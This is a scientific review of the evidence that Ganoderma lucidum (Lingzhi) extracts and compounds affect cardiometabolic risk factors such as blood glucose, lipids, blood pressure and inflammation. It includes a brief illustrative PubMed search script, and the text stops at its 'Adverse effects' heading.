Context: Various herbal medicines are thought to be useful in the management of cardiometabolic disease and its risk factors. Ganoderma lucidum (Curtis) P. Karst. (Ganodermataceae), also known as Lingzhi, has received considerable attention for various indications, including some related to the prevention and treatment of cardiovascular and metabolic disease by ameliorating major cardiovascular risk factors.

Objective: This review focuses on the major studies of the whole plant, plant extract, and specific active compounds isolated from G. lucidum in relation to the main risk factors for cardiometabolic disease.

Methods: References from major databases including PubMed, Web of Science, and Google Scholar were compiled. The search terms used were Ganoderma lucidum, Lingzhi, Reishi, cardiovascular, hypoglycaemic, diabetes, dyslipidaemia, antihypertensive, and anti-inflammatory.

Results: A number of in vitro studies and in vivo animal models have found that G. lucidum possesses antioxidative, antihypertensive, hypoglycaemic, lipid-lowering, and anti-inflammatory properties, but the health benefits in clinical trials are inconsistent. Among these potential health benefits, the most compelling evidence thus far is its hypoglycaemic effects in patients with type 2 diabetes or hyperglycaemia.

Conclusions: The inconsistent evidence about the potential health benefits of G. lucidum is possibly because of the use of different Ganoderma formulations and different study populations. Further large controlled clinical studies are therefore needed to clarify the potential benefits of G. lucidum preparations standardised by known active components in the prevention and treatment of cardiometabolic disease.
Introduction
Cardiovascular disease (CVD) is highly prevalent, with ischaemic heart disease and stroke being the two leading causes of mortality throughout the world (World Health Organization 2021). Metabolic syndrome is characterised by a cluster of conditions including insulin resistance, central obesity, hypertension, dyslipidaemia, and low-grade chronic inflammation (Eckel et al. 2005). Several drug treatments for CVD have been derived from plant sources, such as digoxin and reserpine. Herbal medicines are now becoming more popular, representing a potentially cost-effective class of substances for combating CVD if safe and effective therapies can be identified. The common herbal medicines used in the West include Asian ginseng, astragalus, flaxseed oil, garlic, ginkgo, grape seeds, green tea, hawthorn, milk thistle, and soy (Liperoti et al. 2017). Herbal formulae are widely used in the clinic in China for hypertension, dyslipidaemia, coronary heart disease, and heart failure (Liu and Huang 2016).
Ganoderma (Ganodermataceae) is a genus of woody mushrooms found all over the world. Individual species are identified according to different characteristics, such as the shape and colour (red, black, blue/green, white, yellow, and purple) of the fruiting bodies, host specificity, and geographical origin (Upton 2000; Wachtel-Galor et al. 2011). Ganoderma lucidum (Curtis) P. Karst. (Curtis 1781), known as Lingzhi in China and Reishi in Japan, has been used in traditional Chinese medicine (TCM) for over 2000 years for a broad range of indications including improving general health, wellbeing, and longevity (Bishop et al. 2015; Klupp et al. 2015).
A variety of commercial products from G. lucidum, such as powders, dietary supplements, and tea (Wachtel-Galor et al. 2011), are available. They have been shown to possess a range of activities against CVD, including effects on lipids, blood pressure, obesity, diabetes, and antioxidant and radical scavenging properties (Liu and Tie 2019; Meng and Yang 2019; Winska et al. 2019). However, scientific evidence supporting the beneficial medical properties of G. lucidum is still inconclusive (Hapuarachchi et al. 2016). Many of the commercial products from G. lucidum may not have undergone effective standardisation, so it is difficult to compare results from different studies with different products. Many different herbal supplements or nutraceutical commercial products bearing the names Lingzhi, Reishi, or Ganoderma, etc., contain extracts from various parts of G. lucidum, often in combination with other herbal components. Ganopoly™ (Encore Health), which is a product containing water-soluble G. lucidum polysaccharides, has been used in some animal and clinical studies.
Methods
In this review, the major studies of the whole plant, plant extract, and specific active compounds isolated from G. lucidum in relation to the main risk factors for CVD, with particular emphasis on the more recent studies, are summarised. Electronic literature searches were performed using PubMed, Web of Science, and Google Scholar (published from 1961 to 2021). The search terms used were Ganoderma lucidum, Lingzhi, Reishi, cardiovascular, hypoglycaemic, diabetes, dyslipidaemia, antihypertensive, and anti-inflammatory. A total of 4224 articles were identified. The bibliographies of all relevant articles thus located were also scanned for further relevant references. S.W.C. and B.T. extracted all articles independently based on the relevance, quality, and strength of the studies; only a shortlist of 115 studies with representative findings is discussed below.
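As an illustration only, a search like the one described could be reproduced programmatically. The sketch below assumes Biopython's Entrez module and a hypothetical combined boolean query; the authors' exact query syntax and database-specific filters are not reported, so this is not their protocol.

```python
# Minimal sketch of a PubMed search combining the review's stated terms.
# Assumes Biopython is installed; the boolean grouping is illustrative,
# not the authors' actual query.
from Bio import Entrez

Entrez.email = "your.name@example.org"  # placeholder address required by NCBI

query = (
    '("Ganoderma lucidum" OR Lingzhi OR Reishi) AND '
    "(cardiovascular OR hypoglycaemic OR diabetes OR dyslipidaemia "
    "OR antihypertensive OR anti-inflammatory)"
)

handle = Entrez.esearch(db="pubmed", term=query, retmax=100,
                        mindate="1961", maxdate="2021", datetype="pdat")
record = Entrez.read(handle)
handle.close()
print("hits:", record["Count"])            # total matching records
print("first IDs:", record["IdList"][:5])  # PubMed IDs for screening
```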
Active constituents of G. lucidum

G. lucidum is thought to have numerous different biologically active constituents, the main ones being various triterpenes, polysaccharides, and proteins (Ahmad 2018; Ahmad et al. 2013). The pharmacologically active compounds are present in different amounts in various parts of the mushroom such as the fruiting bodies, mycelium, and spores.
Triterpenes
Terpenes are a large and diverse group of naturally occurring compounds derived from the branched C5 carbon skeleton of isoprene. Triterpenes are a subclass of terpenes and are derived from squalene, a C30 hydrocarbon (Abdullah et al. 2012). They can be classified based on the number of cyclic structures making up the compounds. To date, more than 150 triterpenes have been identified from the spores, fruiting bodies, and mycelia of G. lucidum (Xia et al. 2014; Baby et al. 2015). The methods of extraction of triterpenes usually involve methanol, ethanol, chloroform, ether, acetone, or a mixture of these solvents. The extracts can be further purified by various separation methods such as normal- and reverse-phase high-performance liquid chromatography (HPLC) (Chen et al. 1999). The majority of triterpenes identified are ganoderic acids and lucidenic acids; other important triterpenes include ganodermic acids, ganoderals, and ganoderiols (Wachtel-Galor et al. 2011). The strong bitterness of G. lucidum originates from its triterpenoid compounds, and the bitterness depends on the strain, cultivation conditions, and manufacturing processes (Seo et al. 2009). Triterpenoids have been reported to exhibit various biological activities including antihypertensive, lipid-lowering, anti-acetylcholinesterase, antioxidant, and anticancer activities (Abdullah et al. 2012; Chen et al. 2017).
Polysaccharides and peptidoglycans

G. lucidum polysaccharides are macromolecules with a molecular mass above 500 kDa. Many different polysaccharides, including (1→3)- and (1→6)-α/β-glucans, α-D-glucans, α-D-mannans, and polysaccharide-protein complexes, have been identified from the spores, fruiting bodies, and mycelia of G. lucidum. These compounds are reported to have immunomodulatory and anticancer activities (Xu et al. 2011; Kao et al. 2013). Glucose, together with xylose, mannose, galactose, and fucose in different conformations, forms the major component of the polysaccharide molecules. Polysaccharides are the major component by weight among all constituents in the spores. Several of the mushroom polysaccharide compounds have proceeded through Phase I, II, and III clinical trials and have been used in some Asian countries to treat various cancers and other diseases (Wasser 2010). The contents of polysaccharides differ among commercial Lingzhi products (Wachtel-Galor et al. 2011). A polysaccharide-based product extracted from the spores of G. lucidum, originally named 'Ji 731 Injection', has been used since 1973 in China for treating myopathy (Zeng et al. 2018). The drug was renamed 'Ji Sheng Injection' in 1985 and subsequently 'Polysaccharidum of G. lucidum Karst Injection' (Lin Bao Duo Tang Zhu She Ye), and is still used as an intramuscular injection for various types of immune-mediated muscle diseases. Various bioactive peptidoglycans possessing antiviral (Li et al. 2005) and immunomodulating activities (Zhang et al. 2019), such as ganoderans A, B, and C, have also been isolated from G. lucidum.
Bioactive proteins
Several bioactive proteins from G. lucidum have been reported. One of these is a polypeptide called Lingzhi-8 (LZ-8) which consists of 110 amino acids with a molecular mass of 12 kDa. It has an immunoglobulin-like structure and was the first immunomodulatory protein isolated from the mushroom in 1989 (Hsu and Cheng 2018). Another protein from the fruiting bodies of G. lucidum is ganodermin, which has a molecular mass of 15 kDa and has antifungal activity.
Health benefits of G. lucidum
Antioxidant effects
Free radicals are unstable and highly reactive chemical entities which contain one or more unpaired electrons and can be uncharged or charged. At physiological levels, free radicals support cell signalling, the immune system, and the maintenance of normal body functioning. However, excessive formation and/or insufficient removal of reactive oxygen species (ROS) and reactive nitrogen species (RNS), a state known as 'oxidative stress', can alter the blood vessel wall, creating an environment that facilitates the progression of atherosclerosis and leading to various illnesses, such as heart disease, diabetes, and cancer (Johansen et al. 2005; Ullah et al. 2016).
In vitro studies have demonstrated that several constituents of G. lucidum, in particular triterpenoids and polysaccharides, exhibit antioxidant activity, reducing power, and scavenging and chelating abilities (Mau et al. 2002; Saltarelli et al. 2009; Wu and Wang 2009; Liu et al. 2010; Sarmadi and Ismail 2010; Kozarski et al. 2011; Ferreira et al. 2015; Krishna et al. 2016). In contrast, polysaccharide extracts of G. lucidum have superoxide and hydroxyl radical scavenging activities but do not show antioxidative activity as measured by the malondialdehyde (MDA) content of liver microsomes (Liu et al. 1997). It has been demonstrated that the phenolic compounds from the fresh fruiting bodies of G. lucidum exhibit strong 1,1-diphenyl-2-picrylhydrazyl (DPPH) radical scavenging activity but low superoxide dismutase (SOD) activity. The same study showed that DPPH radical scavenging activity and SOD activity were positively correlated with individual phenolic compounds including caffeic acid, catechin, ferulic acid, gallic acid, myricetin, naringin, pyrogallol, protocatechuic acid, homogentisic acid, and quercetin, as well as with total phenolic compounds (Kim et al. 2008). A study comparing the antioxidant activities of four of the most widely known mushrooms, including G. lucidum, demonstrated that polysaccharide extracts exhibited a strong correlation between reducing power and the total amount of phenols and α-glucans, while a correlation between reducing power and the amount of total polysaccharides and proteins was not found (Kozarski et al. 2012).
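For readers unfamiliar with how such correlations are typically quantified, the sketch below computes a Pearson correlation between total phenolic content and DPPH scavenging on made-up values; it is purely illustrative and uses none of the cited studies' data.

```python
# Illustrative Pearson correlation between total phenolic content and DPPH
# radical scavenging activity. The numbers are synthetic placeholders, not
# data from Kim et al. (2008) or Kozarski et al. (2012).
from scipy.stats import pearsonr

total_phenolics = [4.1, 5.3, 6.0, 7.2, 8.5]       # e.g., mg GAE/g extract
dpph_scavenging = [31.0, 38.5, 44.2, 52.8, 60.1]  # % inhibition

r, p = pearsonr(total_phenolics, dpph_scavenging)
print(f"Pearson r = {r:.3f}, p = {p:.4f}")
```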
In vivo studies have shown that G. lucidum increases the activity of the antioxidant enzymes SOD and catalase (CAT), which are involved in removing harmful ROS (Cherian et al. 2009; Yurkiv et al. 2015; Vitak et al. 2017; Rahman et al. 2018). In an ischaemia-reperfusion isolated perfused rat heart model, administration of G. lucidum extract (400 mg/kg for 15 days) exhibited antioxidant properties, and the authors concluded that the cardioprotective properties of G. lucidum extract are related to its antioxidant effects (Lasukova et al. 2015). A study in rats showed that G. lucidum ethanol extract (250 mg/kg body weight) ameliorated the cardiotoxicity of adriamycin by reducing the increase in lipid peroxidation and reversing the decrease in the antioxidant enzymes glutathione peroxidase (GPx), glutathione-S-transferase (GST), SOD, and CAT in heart tissue (Rajasekaran and Kalaimagal 2012). The cardioprotective effect of G. lucidum may be attributed to its antioxidant triterpenes and polysaccharides (Wachtel-Galor et al. 2004b). In a carotid-artery-ligation mouse model, daily oral G. lucidum (300 mg/kg/day) prevented neointimal thickening 2 weeks after ligation. Furthermore, subcutaneous injections of ganoderma triterpenoid (GT) crude extract (300 mg/kg/day) abolished ligation-induced neointima formation. The authors concluded that GTs prevent atherogenesis by eliminating disturbed-flow-induced oxidative stress through inhibiting the induction of a series of atherogenic factors, as well as inflammation.
A short-term supplementation study over 10 days in healthy subjects showed an improvement in antioxidant status (Wachtel-Galor et al. 2004a), but a longer double-blind, placebo-controlled, cross-over intervention study over 4 weeks with a commercially available encapsulated Lingzhi preparation (1.44 g Lingzhi/day; equivalent to 13.2 g fresh mushroom/day) showed no significant effects in a range of biomarkers for antioxidant status, cardiovascular risk, DNA damage, immune status, and inflammation (Wachtel-Galor et al. 2004b). A placebo-controlled cross-over study in 42 healthy subjects examined the antioxidation and hepatoprotective efficacy of triterpenoids and polysaccharide-enriched G. lucidum, which was taken as a 225 mg capsule containing 7% triterpenoid-ganoderic acid (A, B, C, C5, C6, D, E and G), 6% polysaccharide peptides with a few essential amino acids and trace elements, once daily for 6 consecutive months (Chiu et al. 2017). The treatment showed an improvement in total antioxidant capacity, total thiols and glutathione content in plasma, significantly enhanced activities of antioxidant enzymes (SOD, CAT, GPx and glucose-6-phosphate dehydrogenase), and reduced the levels of thiobarbituric acid reactive substances, 8-hydroxy-deoxy-guanosine and hepatic marker enzymes, glutamic-oxaloacetic transaminase and glutamic-pyruvic transaminase. Mild fatty liver detected by abdominal ultrasonic examination was reversed to normal with G. lucidum treatment.
Hypoglycaemic activity
Hyperglycaemia may increase the susceptibility to lipid peroxidation and modulate glucose metabolism in the body, which ultimately contributes to the increased incidence of atherosclerosis or further accelerates its progression (Giugliano et al. 1996; Poznyak et al. 2020). Insulin treatment is essential for people with type 1 diabetes. In type 2 diabetes mellitus (T2DM), lifestyle modification is recommended. If lifestyle modification is not sufficient to achieve glycaemic control, patients should be treated initially with metformin (American Diabetes Association 2020). Metformin belongs to the biguanide class of drugs, which originate from the plant goat's rue or French lilac (Galega officinalis, Linnaeus, [Fabaceae]) (Witters 2001). Recently, the glucagon-like peptide 1 (GLP-1) receptor agonists and sodium-glucose cotransporter 2 (SGLT2) inhibitors, the latter developed from phlorizin, a natural compound isolated from the bark of apple roots (Tomlinson et al. 2017), have been considered suitable for first-line treatment in some patients with T2DM who have concomitant cardiac or renal disease, in order to improve cardiovascular outcomes (Davies et al. 2018). The hypoglycaemic effects of various extracts from G. lucidum have been studied in different animal models of diabetes and in in vitro experiments to identify mechanisms (Ma et al. 2015; Wang et al. 2016; Winska et al. 2019). The main in vitro, animal and clinical studies investigating the hypoglycaemic effects of G. lucidum are summarised in Tables 1-3, respectively.
Hypoglycaemic activity of triterpenoids

A series of in vitro studies by Fatmawati and colleagues identified that a methanol extract from the fruiting bodies of G. lucidum has a strong inhibitory effect on human aldose reductase activity. Ganoderic acid Df (Figure 1), a lanostane-type triterpenoid, exhibited potent aldose reductase inhibitory activity with an IC50 value of 22.8 µM (Fatmawati et al. 2009, 2010). Fatmawati et al. (2011a) subsequently demonstrated that ganoderol B (Figure 2), isolated from a chloroform extract of G. lucidum, was effective in inhibiting α-glucosidase activity with an IC50 value of 119.8 µM, an inhibitory effect stronger than that of acarbose, which is commonly used as a medication to inhibit α-glucosidase in patients with T2DM. Structure-activity studies were performed to identify the structural requirements of lanostane-type triterpenoids from G. lucidum necessary to increase α-glucosidase inhibitory activity (Fatmawati et al. 2013).
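For context, IC50 values such as those quoted above are conventionally obtained by fitting enzyme activity measured at several inhibitor concentrations to a Hill-type inhibition model; the papers cited above do not state the exact fitting procedure, so the following is a generic illustration:

$$ v([I]) = \frac{v_0}{1 + \left([I]/\mathrm{IC}_{50}\right)^{h}} $$

where \(v_0\) is the uninhibited enzyme activity, \([I]\) is the inhibitor concentration, \(h\) is the Hill coefficient, and \(\mathrm{IC}_{50}\) is the inhibitor concentration that halves activity. Lower IC50 values therefore indicate more potent inhibition, which is why ganoderol B, with an IC50 below that of acarbose in the same assay, is described as the stronger inhibitor.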
Hypoglycaemic activity of proteoglycans/peptidoglycans

Inhibition of PTP1B activity has been regarded as a potential therapy for T2DM for many years (Johnson et al. 2002). Fudan-Yueyang-G. lucidum (FYGL), which is a water-soluble macromolecular proteoglycan extracted from the fruiting bodies of G. lucidum, inhibits PTP1B activity with an IC50 value of 5.12 ± 0.05 mg/mL (Teng et al. 2011). FYGL enhances glycogen synthesis and inhibits the expression of glycogen synthase kinase-3β (GSK3β) in liver tissues of ob/ob mice and in HepG2 cells, probably via modulating insulin receptor substrate 1 (IRS1)/phosphatidylinositol-3 kinase (PI3K)/protein kinase B (Akt)/AMP-activated protein kinase (AMPK)/GSK3β cascades (Yang et al. 2018a). In rat myoblast PTP1B-transfected L6 cells, FYGL improves insulin resistance by regulating IRS1-glucose transporter type 4 (GLUT4) cascades in the insulin signalling pathway (Yang et al. 2018b). In streptozotocin-induced T2DM mice, FYGL reduces plasma glucose levels with an effect comparable to metformin and rosiglitazone, via inhibiting PTP1B expression and activity and consequently modulating the tyrosine phosphorylation level of the insulin receptor (IR) β-subunit (Teng et al. 2011, 2012). In addition, FYGL improves the plasma biochemistry indexes associated with T2DM-accompanied metabolic disorders, including free fatty acids, triglycerides (TG), total cholesterol (TC), low-density lipoprotein cholesterol (LDL-C), and high-density lipoprotein cholesterol (HDL-C) (Teng et al. 2012). Further mechanistic studies in db/db mice found that the hypoglycaemic effect of FYGL is associated with its ability to enhance insulin secretion, decrease hepatic glucose output, and increase adipose and skeletal muscle glucose disposal (Pan et al. 2013, 2014). In normal and alloxan-induced hyperglycaemic mice, a water extract of the fruiting bodies of G. lucidum and the two peptidoglycans subsequently produced from it by fractionation, ganoderans A and B, have all shown hypoglycaemic activity (Hikino et al. 1985). Administration of ganoderan B increases plasma insulin levels in normal and glucose-loaded mice; it also increases the activities of hepatic glucokinase, phosphofructokinase, and glucose-6-phosphate dehydrogenase, decreases hepatic glucose-6-phosphatase (G6Pase) and glycogen synthetase activities, and does not affect the activities of hexokinase and glycogen phosphorylase (GP) (Hikino et al. 1989).

Table 2. Animal studies on the hypoglycaemic effects of G. lucidum.
Reference | Animal model | Interventions | Findings
Hikino et al. 1985 | Normal and alloxan-induced hyperglycaemic mice | Water extracts (10^4 mg/kg crude drug equivalent, i.p.) of the fruiting bodies of G. lucidum for 7 or 27 h | Reduced plasma glucose; two glycans, ganoderans A and B, with hypoglycaemic action isolated
Hikino et al. 1989 | Normal and glucose-loaded mice | Ganoderan B | Increased insulin and altered enzyme activities
Kino et al. 1990 | Autoimmune diabetes model in non-obese mice | Ling Zhi-8 immunomodulatory protein (10.3-12.6 mg/kg twice weekly) from 4 weeks of age, followed up to 42 weeks of age | Prevented development of autoimmune diabetes by an immunosuppressive mechanism
Zhang et al. 2003 | Alloxan-induced diabetic mice | Pre-treatment with intragastric Gl-PS (50-200 mg/kg) for 10 days | Gl-PS partly protected beta cells from necrosis
Zhang and Lin 2004 | Normal fasted mice | Gl-PS (25-100 mg/kg) given by single intraperitoneal injections | Reduced serum glucose and increased insulin levels
He et al. 2006 | Streptozotocin-induced diabetic mice | Gl-PS (125 and 250 mg/kg) given for 8 weeks | Reduced serum glucose, increased insulin levels, and delayed progression of diabetic renal disease
Seto et al. 2009 | Genetically obese/diabetic (+db/+db) and lean (+db/+m) mice | Water extract of G. lucidum | Lowered serum glucose via down-regulation of hepatic PEPCK gene expression
Hypoglycaemic activity of Ganoderma polysaccharides

Hypoglycaemic effects of polysaccharides from G. lucidum (Gl-PS) have been demonstrated in several in vitro and in vivo studies. Gl-PS showed a protective effect against alloxan-induced damage to pancreatic islets in vitro. Pre-treatment with intragastric Gl-PS (50-200 mg/kg) for 10 days produced hypoglycaemic effects via its scavenging ability, protecting the pancreatic β-cells from alloxan-induced necrosis (Zhang et al. 2003). Gl-PS (25-100 mg/kg) given by single intraperitoneal injections to normal fasted mice reduced serum glucose levels after 3 and 6 h in a dose-dependent manner and increased insulin levels from 1 h after administration via enhancing Ca2+ influx into pancreatic β-cells (Zhang and Lin 2004). Furthermore, administration of Gl-PS produced hypoglycaemic effects and an improvement in lipid profile in streptozotocin-induced diabetic mice (He et al. 2006; Li et al. 2011; Zheng et al. 2012). It has been suggested that the hypoglycaemic effect operates mainly through preventing apoptosis of pancreatic β-cells and enhancing β-cell regeneration (Zheng et al. 2012), together with modulation of serum insulin and of the hepatic mRNA levels of several key enzymes involved in gluconeogenesis and/or glycogenolysis, including GP, fructose-1,6-bisphosphatase (FBPase), phosphoenolpyruvate carboxykinase (PEPCK), and G6Pase (Xiao et al. 2012). Xiao et al. (2017) isolated F31, a β-heteropolysaccharide with a weight-average molecular weight of 15.9 kDa, from Gl-PS. The mechanism of action of F31 may be associated with down-regulation of hepatic glucose-regulatory enzyme mRNA levels via AMPK activation, improvement of insulin resistance, and reduction of the epididymal fat/body weight ratio (Xiao et al. 2017). An integrative analysis of transcriptomics and proteomics data from the livers of F31-treated diabetic db/db mice found that genes in the glycolysis and gluconeogenesis pathways, the insulin pathway, and lipid metabolism pathways showed significantly different expression compared to untreated mice, and that microRNAs probably participate in the regulation of the genes involved in glucose metabolism (Xiao et al. 2018).
Hypoglycaemic activity of Ganoderma extracts

Some other studies used extracts of G. lucidum in which the active constituents were not clearly identified. A water extract of G. lucidum given to lean (+db/+m) and genetically obese/diabetic (+db/+db) mice lowered the serum glucose level in +db/+db mice after one week of treatment and in +db/+m mice after 4 weeks, through down-regulation of hepatic PEPCK gene expression (Seto et al. 2009). A study in alloxan- and steroid-induced diabetic rats showed that a petroleum ether extract and a methanol extract of G. lucidum given orally at 200, 400, 600, and 800 mg/kg/day for 7 days reduced plasma glucose levels, increased insulin sensitivity, and decreased lipid levels; the bioactive constituents were suspected to be polysaccharides present in the extracts (Sarker 2015). A hypoglycaemic effect was also observed following administration of an alcoholic extract of G. lucidum (250, 500, and 1000 mg/kg) given for 14 days in alloxan-induced diabetic rats (Ratnaningtyas et al. 2018). Another recent study in streptozotocin-induced diabetic rats showed that a hydroethanolic extract of G. lucidum containing β-glucan, proteins, and phenols reduced plasma glucose and lipid levels through preservation of pancreatic islets (Bach et al. 2018).
Hypoglycaemic activity of Ganoderma proteins

Ling Zhi-8 (LZ-8), an immunomodulatory protein isolated from the mycelial extract of G. lucidum, prevented the development of autoimmune diabetes by reducing antigen-induced antibody formation in non-obese diabetic mice (Kino et al. 1990). In a model of transplanted allogeneic pancreatic rat islets, LZ-8 delayed the rejection of allografted islets (van der Hem et al. 1995).
Evidence from clinical studies
Clinical studies of the hypoglycaemic/antidiabetic effects of G. lucidum products are very limited. In a placebo-controlled study in 62 patients with T2DM, administration of Ganopoly™ at 1800 mg three times daily for 12 weeks reduced fasting and postprandial plasma glucose levels, as well as HbA1c (Gao et al. 2004b). Administration of a dry extract of G. lucidum (3 g) in addition to regular oral hypoglycaemic agents for 12 weeks did not affect fasting glucose or HbA1c; however, the plasma glucose area under the curve during a meal tolerance test was reduced more significantly in patients taking G. lucidum (Wang et al. 2008). A randomised, double-blind, placebo-controlled, cross-over study, with a placebo-controlled run-in period, of a Lingzhi product at a dose of 1.44 g daily for 12 weeks was performed in subjects with borderline elevations of blood pressure and/or cholesterol. There were reductions in plasma insulin and homeostasis model assessment-insulin resistance with Lingzhi compared to placebo. The subjects in this study had normal plasma glucose levels, and it was speculated that the effects on insulin and insulin resistance would be greater in subjects with impaired glucose tolerance or T2DM (Chu et al. 2012). However, in a more recent study in 84 patients with T2DM and metabolic syndrome, administration of G. lucidum alone or combined with Cordyceps sinensis [now called Ophiocordyceps sinensis (Berk.) Sacc. (Ophiocordycipitaceae)] over 16 weeks did not show any improvement in hyperglycaemia or cardiovascular risk factors (Klupp et al. 2016). It is noteworthy that different extracts of G. lucidum will have different components, so it may not be appropriate to compare results from different studies.
Effects on dyslipidaemia
Dyslipidaemia, which is characterised by decreased levels of HDL-C accompanied by increased levels of TG, apo B, and small dense LDL particles, is an important modifiable risk factor for the development of atherosclerosis and CVD. Guidelines for the treatment of lipid disorders recommend initiating treatment with the 3-hydroxy-3-methylglutaryl-coenzyme A (HMG-CoA) reductase inhibitors, or statins (Grundy et al. 2019; Mach et al. 2020). Statins have their origin in products isolated from fungi (Endo 2004).
In vitro studies have shown that polysaccharides and oxygenated triterpenoids from G. lucidum have a very broad spectrum of biological activities and pharmacological effects. Some types of ganoderic acid might reduce cholesterol by inhibiting HMG-CoA reductase, like the statin drugs (Shiao 2003). Compounds isolated from the fruiting bodies of G. lucidum, including ganolucidic acid η, ganoderenic acid K, and the farnesyl hydroquinones ganomycin J and ganomycin B, showed strong inhibitory activity against HMG-CoA reductase (Figure 3) (Chen et al. 2017).
The cholesterol-lowering properties of G. lucidum have been demonstrated in a series of in vitro and ex vivo studies, and in hamsters and minipigs (Berger et al. 2004). The organic fractions containing oxygenated lanosterol derivatives inhibited cholesterol synthesis in T9A4 hepatocytes. The investigators found that both 2.5 and 5% dried G. lucidum reduced hepatic microsomal ex-vivo HMG-CoA reductase activity. In hamsters, administration of 5.0% dried G. lucidum decreased TC and HDL-C but not LDL-C, whereas in minipigs, 2.5% dried G. lucidum reduced all these parameters.
The improvements in the lipid profile in some diabetic animal models and in patients with T2DM treated with G. lucidum products may be related to the improvement in glycaemic control, rather than a direct effect on lipid metabolism, as hyperglycaemia is often associated with elevated TG and reduced HDL-C (Taskinen and Borén 2015). In a randomised, double-blind, cross-over study in 26 patients with borderline elevations of blood pressure and/or cholesterol, administration of Lingzhi (1.44 g extract/day) for 12 weeks produced a non-significant trend for a reduction in TG and an increase in HDL-C (Chu et al. 2012). Those changes could have been related to improvements in insulin resistance, as these lipid abnormalities cluster together with hypertension, central obesity, and insulin resistance in the metabolic syndrome.
Antihypertensive effects
The most recent guidelines for the management of hypertension recommend initiating antihypertensive drug therapy in most patients with a combination of two different drugs from the classes of thiazide diuretics, calcium channel blockers, angiotensin converting enzyme (ACE) inhibitors, or angiotensin receptor blockers (ARBs) (Whelton et al. 2018; Williams et al. 2018).
Triterpenes and G. lucidum proteins have been demonstrated to possess potent ACE-inhibitory properties in vitro (Abdullah et al. 2012; Mohamad Ansor et al. 2013). Mohamad Ansor et al. (2013) reported that protein fractions from the mycelia of G. lucidum contain highly potent anti-ACE proteins with IC50 values below 200 µg/mL. Furthermore, three small peptides with ACE-inhibitory activity, Gln-Leu-Val-Pro (QLVP), Gln-Asp-Val-Leu (QDVL), and Gln-Leu-Asp-Leu (QLDL), were recently isolated from G. lucidum mycelia (Wu et al. 2019). Notably, QLVP acted as a mixed-type inhibitor of ACE, with an IC50 value of 127.9 µmol/L.
A transverse aortic constriction (TAC) mouse model of pressure-overload-induced cardiomyopathy and heart failure revealed that administration of oral Ganoderma spore oil every other day for 14 days normalised the ejection fraction, corrected the fractional shortening, and reduced left ventricular hypertrophy. The cardioprotective effect was associated with reduced expression of the circular RNA circ-Foxo3, which plays a role in the pathogenesis of heart failure (Xie et al. 2016).
An early uncontrolled trial in Japan showed that supplementation with G. lucidum extract (240 mg daily) for 6 months reduced blood pressure in hypertensive patients but not in borderline hypertensive or normotensive subjects (Kanmatsuse et al. 1985). In a double-blind, randomised, placebo-controlled study in 160 patients with confirmed coronary heart disease (CHD), treatment with G. lucidum polysaccharides (Ganopoly™) for 12 weeks improved the symptoms of CHD and reduced average blood pressure from 142.5/96.4 mmHg to 135.1/92.8 mmHg, whereas there was no significant blood pressure reduction in the control group (Gao et al. 2004a). Serum TC also decreased significantly with Ganopoly™ therapy, but not in the control group.
Anti-inflammatory effects
Inflammation is a physiological response to harmful stimuli that are physical, chemical, or biological in nature. A number of inflammatory markers, such as high-sensitivity C-reactive protein (hsCRP), interleukin (IL)-6, IL-1, and tumour necrosis factor (TNF)-α, have been shown to be associated with obesity, metabolic syndrome, and an elevated risk of chronic diseases (Pravenec et al. 2011; Dallmeier et al. 2012). Elevated circulating levels of hsCRP and IL-6 predict the development of T2DM through diminishing insulin sensitivity (Guarner and Rubio-Ruiz 2015). Obesity-induced inflammation has been implicated as a risk factor in the pathogenesis of T2DM, insulin resistance, CVD, and metabolic syndrome (Kumar et al. 2019).
There are several in vitro studies showing the anti-inflammatory effect of G. lucidum extracts. The triterpene extract from G. lucidum reduced the secretion of TNF-α and IL-6, and of the inflammatory mediators nitric oxide (NO) and prostaglandin E2 (PGE2), from lipopolysaccharide (LPS)-activated murine macrophages via inhibition of nuclear factor-κB (NF-κB) and activator protein 1 (AP-1) signalling (Dudhgaonkar et al. 2009). G. lucidum sterols downregulated the mRNA expression of NO, TNF-α, IL-1β, and IL-6, and attenuated LPS-induced cell polarisation by modulating mitogen-activated protein kinase (MAPK) and NF-κB pathways (Xu et al. 2021). Furthermore, G. lucidum ethanol extract reduced the excessive production of NO, PGE2, and the pro-inflammatory cytokines IL-1β and TNF-α via inhibition of the NF-κB and toll-like receptor signalling pathways in LPS-stimulated BV2 microglial cells (Yoon et al. 2013).
In an in vivo study, administration of water extract of G. lucidum (2 g/kg, s.c.) 1 h prior to applying carrageenan reduced both the first and second phases of carrageenan-induced inflammation (Lin et al. 1993). It has been demonstrated that both ethyl acetate and 70% methanol extracts of G. lucidum (500 and 1000 mg/kg) produced anti-inflammatory effects against carrageenan-induced acute and formalin-induced chronic inflammation in mice and the effect was comparable to that of the standard reference drug, diclofenac (10 mg/kg) (Sheena et al. 2003).
The anti-inflammatory effect of G. lucidum supplementation has been investigated in several small-scale trials. In a clinical trial involving 45 ST-elevation myocardial infarction (STEMI) and non-STEMI patients, polysaccharides of G. lucidum (750 mg/day in 3 divided doses for 90 days) decreased the levels of IL-1 and TNF-α, as well as MDA levels (Sargowo et al. 2019). In a recent randomised closed-label clinical trial involving 38 patients with atrial fibrillation, consumption of polysaccharides of G. lucidum (PT Sahabat Lingkungan Hidup, Surabaya, Indonesia), 3 times a day for 90 days, significantly reduced systolic and diastolic blood pressure, heart rate, LDL-C, IL-1β, IL-6, hsCRP, and TNF-α, compared to placebo-treated patients (Rizal et al. 2020). These data suggest that G. lucidum polysaccharide peptides may have beneficial effects against factors involved in the pathogenesis of atherosclerosis and atrial fibrillation. The main active compounds which have been shown to influence some of the major risk factors for CVD are shown in Figure 4.

Figure 4. Main active compounds of G. lucidum influencing major cardiovascular risk factors. Triterpenoids: ganoderic acid Df (aldose reductase inhibitor); ganoderol B (α-glucosidase inhibitor). Proteoglycans/peptidoglycans: Fudan-Yueyang G. lucidum (FYGL; inhibitor of protein tyrosine phosphatase 1B); ganoderan B (increases insulin). Polysaccharides: Gl-PS (increase insulin by protecting pancreatic β-cells; decrease IL-1β, IL-6, hsCRP, and TNF-α); F31 (alters glucose regulatory enzymes). Proteins: Ling Zhi-8 (immunosuppressive, preventing autoimmune pancreatic damage).
Adverse effects
